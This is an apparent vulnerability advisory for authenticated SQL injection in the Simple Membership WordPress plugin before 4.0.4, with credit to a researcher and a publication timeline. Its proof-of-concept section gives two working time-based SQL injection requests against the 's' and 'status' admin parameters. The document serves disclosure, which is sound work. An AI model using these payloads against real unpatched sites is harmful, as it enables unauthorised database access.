Simple Membership < 4.0.4 - Authenticated SQL Injections
Description
The plugin did not properly sanitise user input before using it in SQL queries in the admin backend, leading to authenticated (admin+) SQL injections
Proof of Concept
GET /wp/wp-admin/admin.php?status=&membership_level=&s=hhhh%27%20OR%20SLEEP%281%29%20OR%20first_name%20LIKE%20%27%25i%0A&page=simple_wp_membership HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp/wp-admin/admin.php?page=simple_wp_membership Connection: keep-alive Cookie: [admin cookies] Upgrade-Insecure-Requests: 1 In addition to the 's' parameter, the 'status' parameter is similarly vulnerable: GET /wp/wp-admin/admin.php?status=active%27%20AND%20SLEEP%288%29%20AND%20%27a%27%3D%27a&membership_level=&s=&page=simple_wp_membership
Affects Plugins
Fixed in version 4.0.4✓
Classification
Miscellaneous
Original Researcher
Martin Vierula of Trustwave
Verified
Yes
Timeline
Publicly Published
2021-04-05 (about 3 months ago)
Added
2021-04-06 (about 3 months ago)
Last Updated
2021-04-07 (about 3 months ago)